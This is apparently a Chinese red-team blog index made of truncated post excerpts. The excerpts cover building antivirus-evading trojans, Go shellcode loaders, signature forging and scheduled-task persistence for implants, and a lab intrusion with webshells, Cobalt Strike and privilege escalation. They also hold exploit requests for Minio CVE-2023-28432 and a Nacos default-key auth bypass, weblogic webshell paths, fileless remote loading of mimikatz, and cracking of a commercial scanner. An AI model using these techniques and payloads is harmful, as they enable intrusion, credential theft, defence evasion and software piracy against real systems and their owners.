工具开发-红队免杀木马自动生成器
工具开发-红队免杀木马自动生成器开发目的在攻防对抗中,免杀木马是使用频率最高的东西,但是制作起来需要耗费大量时间精力,重复性工作会让人产生疲惫和厌烦
于是我决定开发一款全自动的工具,只需要双击鼠标便可以生成免杀马,因此诞生了这个工具!
环境准备由于本人比较熟悉go,于是决定用go进行开发,但是说实话在开发过程中感受到了很多局限性,比如依赖库问题,后续开发还是选用其他语言较好
环境准备:安装go和git,go版本需要1.20及以上
https://golang.google.cn/dl/go1.21.0.windows-amd64.msi 下载安装go
https://git-scm.com/download/win 下载安装git
下载相关garble等相关依赖,命令如下
12345set GOPROXY=https://goproxy.cn,directgo install mvdan.cc/garble@latestgo mod init 1go get github.com/darkwyrm/b85go get github.com/gonutz/ide
环境未搭建好, ...
靶场学习-突破有防护的靶场
突破有防护的靶场首先使用常规的目录扫描,无法正常扫描出东西
使用代理池低速扫描成功发现robots.txt
访问/SiteServer/跳转至登陆页面,谷歌一波发现历史漏洞,直接禁用js可重置密码
免杀webshell使用哥斯拉免杀马发现不成功,想到哥斯拉在部分环境中无法正常连接,改用其他的webshell连接工具
生成蚁剑免杀马
成功连接webshell
免杀上线CS探测发现出网
查看主机的杀软情况
easy,使用自写的shellcode加载器生成免杀cs木马
https://github.com/Pizz33/GobypassAV-shellcode
上传上去
本来想直接运行的,发现还是被拦截
估计是目录没权限,换到public下,成功上线
由于目标杀软为def,使用bof来规避杀软
本来想着直接探测内网,但发现权限不足
PrintSpoofer直接提权
提完权发现还是无法写入。。。可能是安全狗的原因吧,并且普通的探测无法探测到主机
怀疑对ping进行拦截,使用-np进行绕过,成功探测到主机10.10.1.130
使用c ...
红队技术-攻防实战小技巧
外网打点资产测绘三剑客https://hunter.qianxin.com/https://fofa.info/https://quake.360.cn/
挖掘高价值资产https://github.com/EdgeSecurityTeam/EHole
ehole重构了一版,需要下载source code进行自编译,realease为旧版本
https://github.com/lijiejie/BBScan
挖掘敏感信息和后台地址
1234567891011121314151617181920212223242526272829303132333435363738394041Targets: --host [HOST [HOST ...]] Scan several hosts from command line -f TargetFile Load new line delimited targets from TargetFile -d TargetDirectory Load all *.txt fil ...
红队技术-隐藏上传的程序木马
红队技术-隐藏上传的程序木马1、exe伪装正常程序https://github.com/secretsquirrel/SigThief
python sigthief.py -i 360Safe.exe -t notepad.exe -o tes.exe
123-i 为签名文件-t 为需要伪造的文件-o 为输出文件
https://www.trustasia.com/solution/sign-tools
图标提取
https://github.com/JarlPenguin/BeCyIconGrabberPortable
图标替换
Resource hacker
2、调用计划任务API维权使用计划任务对木马程序做好维权
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293 ...
免杀技术-go shellcode加载bypassAV
go shellcode加载 bypass AV
在攻防实战中免杀技术尤为重要,站在巨人的肩膀上学习go shellcode免杀加载的方法
相关代码打包至github https://github.com/Pizz33/GobypassAV-shellcode
免杀效果预览:
编写一个加载器需要围绕3个基本的功能实现:
申请内存空间:VirtualAlloc、VirtualAlloc2、VirtualAllocEx
导入内存:RtlCopyMemory、RtlCopyBytes、RtlMoveMemory
调用执行:创建线程的方式执行、用syscall调用执行、内嵌C代码执行
内存空间申请VirtualAlloc
1234567VirtualAlloc:在调用进程的虚拟地址空间中保留、提交或更改页面区域的状态(分配的内存初始化为零)SWAPMem, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), 0x1000|0x2000, 0x40)//0:开始内存地址//uintptr(len(shellcode)):申请内存长 ...
漏洞复现-Minio信息泄露漏洞(CVE-2023-28432)
Minio信息泄露漏洞(CVE-2023-28432)12345678910POST /minio/bootstrap/v1/verify HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 0
批量检测脚本
123456 ...
漏洞复现-Nacos身份认证绕过
Nacos身份认证绕过由于secret.key值为默认
12345### The default token(Base64 String):nacos.core.auth.default.token.secret.key=SecretKey012345678901234567890123456789012345678901234567890123456789### 2.1.0 版本后nacos.core.auth.plugin.nacos.token.secret.key=SecretKey012345678901234567890123456789012345678901234567890123456789
可使用 https://jwt.io/#debugger-io 生成可用的token
如果需要登录至nacos,输入任意账密进行抓包
把回显包替换为下面这个
123456789101112HTTP/1.1 200Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY ...
软件破解-xray1.9.4破解
xray1.9.4破解
jl修改为jnl,点击补丁保存
红队技术-weblogic上传getshell路径
weblogic上传getshell路径Linux系统第一种上传目录
123/u01/oracle/wlserver/server/lib/consoleapp/webapp/framework/skins/wlsconsole/css/u01/oracle/wlserver/server/lib/consoleapp/webapp/framework/skins/wlsconsole/images
访问路径
1http://*.*.*.*:7001/console/framework/skins/wlsconsole/images/shell.jsp
第二种上传目录
1/u01/domains/osb/servers/AdminServer/tmp/_WL_internal/uddiexplorer/随机字符/war/666.jsp
访问路径
1http://xxxx/uddiexplorer/shell.jsp
第三种上传目录
1/Oracle/Middleware/user_projects/domains/application/servers/AdminServer/ ...
免杀技术-FilelessPELoader免杀加载
FilelessPELoader免杀加载分享一个好用的PE远程加载项目
https://github.com/TheD1rkMtr/FilelessPELoader
远程内存加载,免杀大部分的杀软
1、首先安装相关python库
1pip install pycryptodome
2、使用aes.py生成两个bin文件,分别为cipher.bin和key.bin
1python aes.py mimikatz.exe
3、使用python开启web服务,
123python -m http.server 80python -m SimpleHTTPServer 8080
4、使用编译好的程序进行远程加载
12FilelessPELoader.exe 192.168.159.3 80 cipher.bin key.bin[+] Usage: FilelessPELoader.exe <Host> <Port> <Cipher> <Key>
同样可以免杀cs上线,测试可以免杀360、火绒、def、eset











